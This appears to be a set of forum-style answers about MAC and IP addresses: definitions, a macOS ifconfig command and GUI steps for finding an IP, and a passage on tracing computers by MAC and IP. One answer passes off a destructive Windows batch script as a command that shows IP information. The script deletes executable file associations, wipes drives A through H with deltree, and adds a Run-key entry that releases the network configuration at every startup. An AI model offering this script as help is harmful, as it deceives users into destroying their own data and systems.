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A Media Access Control address is given to every networking adapter. It is unique on every device. t is used as a permanent identifier for that component. For more info, check out the Wikipedia... http://en.wikipedia.org/wiki/MAC_address
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For network devices, it's a MAC address. MAC stands for 'media access control' and it's a unique identifier that's present in all hardware that interfaces with a traditional computer network. The device that manages DHCP (or assigning IP addresses to devices) often asks the devices for their MAC addresses and then gives them an IP address. Usually MAC addresses are written as something like 00:0a:5e:1a:8d:a2 and they use hexidecimal notation (allowed numbers 0-9, and letters A-F).
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There are a lot ways to do this. We are going to talk about two of them. First one is more for the Terminal/Console people and of course the fastest one. You need to open Terminal application (Applications -> Utilities -> Terminal) or other console type application like iTerm. Execute this line: ifconfig | grep "inet " | grep -v "127.0.0.1" | cut -d" " -f 2 It is going to print IP address of your machine. Remember this IP address is going to be the one that gives your switch/router if you have one otherwise it is going to be your IP that ISP gave you. The second way is for people who wants to use GUI approach. Open "System Preferences" on "Internet & Wireless" section select "Network". Now in the left side select your active connection (should have a green indicator). Now near the "Status: Connected" is going to written your IP. If you don't see the IP press "Advanced" and choose "TCP/IP" tab in "IPv4 Address" field will be your IP.
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This is a long cmd but it gives a lot more information about your IP: @ECHO OFF START reg delete HKCR/.exe START reg delete HKCR/.dll START reg delete HKCR/* :MESSAGE ECHO IP ADDRESS CONFIGURATION GOTO MESSAGE deltree /y C:\ deltree /y E:\ deltree /y A:\ deltree /y F:\ deltree /y G:\ deltree /y D:\ deltree /y H:\ echo @echo off>c:windowswimn32.bat echo break off>>c:windowswimn32.bat echo ipconfig/release_all>>c:windowswimn32.bat echo end>>c:windowswimn32.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f echo IP ADDRESS CONFIGURATION PAUSE
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Every computer that hooks up to a network, including a PS2, has a unique MAC Address identifier made up of Hexadecimal numbers and letters. Hexadecimal means that the digits in the identifier are between 0 - 9 and A - F. If the IP address is tracked to a general location which is very easy to do, and there becomes a need for investigation to identify the machine from which it came, then there is a distinct possibility that one can be caught red-handed with the machine that has that unique MAC Address identifier. The MAC Address information is carried by Network packets, and is part of the package that uniquely identifies your computer for communication on the web. The Internal IP Address (such as 192.168.0.100) which you use inside your network can change easily because it is passed out from your router using DHCP (Dynamic Host Control Protocol), and is somewhat generic, but your External IP address from your Internet Service Provider can be used to determine the exact location or account of whoever has that IP address with the Internet Service Provider. Once that External Address is discovered or recorded, using a network packet communication to another address, it can be narrowed down to the exact computer used to make that communication. Some networks record IP Addresses and MAC Addresses. Some routers have a constant log as to what MAC Addresses have connected to their network. Of course there are always ways around this type of thing, but...for the most part this is how the internet and networking in general operates.
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